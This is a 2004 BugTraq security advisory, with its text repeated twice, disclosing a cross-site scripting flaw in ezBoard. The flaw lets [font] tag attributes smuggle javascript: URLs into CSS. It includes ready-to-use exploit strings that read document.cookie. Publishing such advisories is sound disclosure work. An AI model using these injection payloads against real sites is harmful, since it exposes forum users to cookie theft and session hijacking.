BugTraq
Back to list
|
Post reply
ezBoard Cross Site Scripting Vulnerability
Feb 23 2004 02:09PM
Cheng Peng Su (apple_soup msn com)
########################################################
Advisory Name:ezBoard Cross Site Scripting Vulnerability
Release Date: Feb 24,2004
Application: ezBoard
Version Affected: 7.3u or lower?
Vendor URL: http://www.ezboard.com/
Discover: Cheng Peng Su(apple_soup_at_msn.com)
########################################################
Proof of Concept:
This vuln is from [font],ezBoard doesn't filter illegal characters ,such as ';()
[font color=red;background:url(javascript:{XSS code})]hey[/font] will show
<span style="color:red;background:url(javascript:{XSS code});font-size:small;">hey</span>
and
[font face=Verdana;background:url(javascript:{XSS code})]hey[/font] will show
<span style="font-family:Verdana;background:url(javascript:{XSS code}));font-size:small;">hey</span>
Exploit:
[font color=red;background:url(javascript:alert(document.cookie))]Big Exploit![/font]
[font face=Verdana;background:url(javascript:alert(document.cookie))]Big Exploit![/font]
Contact:
Cheng Peng Su
apple_soup_at_msn.com
Class 1,Senior 2,High school attached to Wuhan University
Wuhan,Hubei,China
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
########################################################
Advisory Name:ezBoard Cross Site Scripting Vulnerability
Release Date: Feb 24,2004
Application: ezBoard
Version Affected: 7.3u or lower?
Vendor URL: http://www.ezboard.com/
Discover: Cheng Peng Su(apple_soup_at_msn.com)
########################################################
Proof of Concept:
This vuln is from [font],ezBoard doesn't filter illegal characters ,such as ';()
[font color=red;background:url(javascript:{XSS code})]hey[/font] will show
<span style="color:red;background:url(javascript:{XSS code});font-size:small;">hey</span>
and
[font face=Verdana;background:url(javascript:{XSS code})]hey[/font] will show
<span style="font-family:Verdana;background:url(javascript:{XSS code}));font-size:small;">hey</span>
Exploit:
[font color=red;background:url(javascript:alert(document.cookie))]Big Exploit![/font]
[font face=Verdana;background:url(javascript:alert(document.cookie))]Big Exploit![/font]
Contact:
Cheng Peng Su
apple_soup_at_msn.com
Class 1,Senior 2,High school attached to Wuhan University
Wuhan,Hubei,China
[ reply ]